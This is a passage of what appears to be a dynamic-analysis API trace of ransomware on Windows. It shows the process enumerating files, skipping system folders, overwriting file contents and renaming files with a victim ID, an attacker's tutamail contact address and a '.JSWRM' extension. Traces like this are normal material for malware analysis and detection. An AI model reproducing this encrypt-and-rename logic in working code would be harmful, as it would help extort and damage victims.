hHeap=0x1e0000) returned 1 [0068.820] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2=".") returned 1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="..") returned 1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="...") returned 1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="windows") returned -1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="recovery") returned -1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="perflogs") returned -1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="documents and settings") returned -1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="system volume information") returned -1 [0068.820] lstrcmpiW (lpString1="Bears.jpg", lpString2="msocache") returned -1 [0068.820] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.jpg", lpUsedDefaultChar=0x0) returned 9 [0068.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0068.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.jpg", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.jpg", lpUsedDefaultChar=0x0) returned 9 [0068.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0068.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.821] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.821] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.822] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9454425611678720) returned 0 [0068.822] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.822] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.822] CloseHandle (hObject=0xffffffff) returned 1 [0068.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.822] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.822] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.822] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0068.823] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0068.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0068.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.823] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.823] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1a3ecc0a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc5d2da05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0xc5d2da05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2=".") returned 1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="..") returned 1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="...") returned 1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="windows") returned -1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="recovery") returned -1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="perflogs") returned -1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="documents and settings") returned -1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="$RECYCLE.BIN") returned 1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="system volume information") returned -1 [0068.823] lstrcmpiW (lpString1="Desktop.ini", lpString2="msocache") returned -1 [0068.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.823] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0068.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Desktop.ini", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Desktop.ini", lpUsedDefaultChar=0x0) returned 11 [0068.823] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.824] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.824] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.824] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=645) returned 1 [0068.824] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.824] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x280) returned 0x203550 [0068.825] ReadFile (in: hFile=0x454, lpBuffer=0x203550, nNumberOfBytesToRead=0x280, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ec04*=0x280, lpOverlapped=0x0) returned 1 [0068.825] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.826] WriteFile (in: hFile=0x454, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ec00*=0x280, lpOverlapped=0x0) returned 1 [0068.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0068.826] CloseHandle (hObject=0x454) returned 1 [0068.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a480 [0068.826] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a480, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a480 | out: hHeap=0x1e0000) returned 1 [0068.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0068.826] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0068.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0068.826] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.826] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Desktop.ini.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\desktop.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0068.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0068.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.828] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2=".") returned 1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="..") returned 1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="...") returned 1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="windows") returned -1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="recovery") returned -1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="perflogs") returned -1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="documents and settings") returned 1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="system volume information") returned -1 [0068.828] lstrcmpiW (lpString1="Garden.htm", lpString2="msocache") returned -1 [0068.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0068.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.htm", lpUsedDefaultChar=0x0) returned 10 [0068.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0068.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.htm", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.htm", lpUsedDefaultChar=0x0) returned 10 [0068.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.828] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.828] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.829] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.829] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9454425611678720) returned 0 [0068.829] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.829] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.829] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.829] CloseHandle (hObject=0xffffffff) returned 1 [0068.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.829] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.829] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0068.830] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0068.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0068.830] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0068.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0068.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.830] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0068.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.830] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.830] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0068.830] lstrcmpiW (lpString1="Garden.jpg", lpString2=".") returned 1 [0068.830] lstrcmpiW (lpString1="Garden.jpg", lpString2="..") returned 1 [0068.830] lstrcmpiW (lpString1="Garden.jpg", lpString2="...") returned 1 [0068.830] lstrcmpiW (lpString1="Garden.jpg", lpString2="windows") returned -1 [0068.830] lstrcmpiW (lpString1="Garden.jpg", lpString2="recovery") returned -1 [0068.830] lstrcmpiW (lpString1="Garden.jpg", lpString2="perflogs") returned -1 [0068.830] lstrcmpiW (lpString1="Garden.jpg", lpString2="documents and settings") returned 1 [0068.831] lstrcmpiW (lpString1="Garden.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.831] lstrcmpiW (lpString1="Garden.jpg", lpString2="system volume information") returned -1 [0068.831] lstrcmpiW (lpString1="Garden.jpg", lpString2="msocache") returned -1 [0068.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.jpg", lpUsedDefaultChar=0x0) returned 10 [0068.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Garden.jpg", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Garden.jpg", lpUsedDefaultChar=0x0) returned 10 [0068.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.831] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.831] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.831] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, 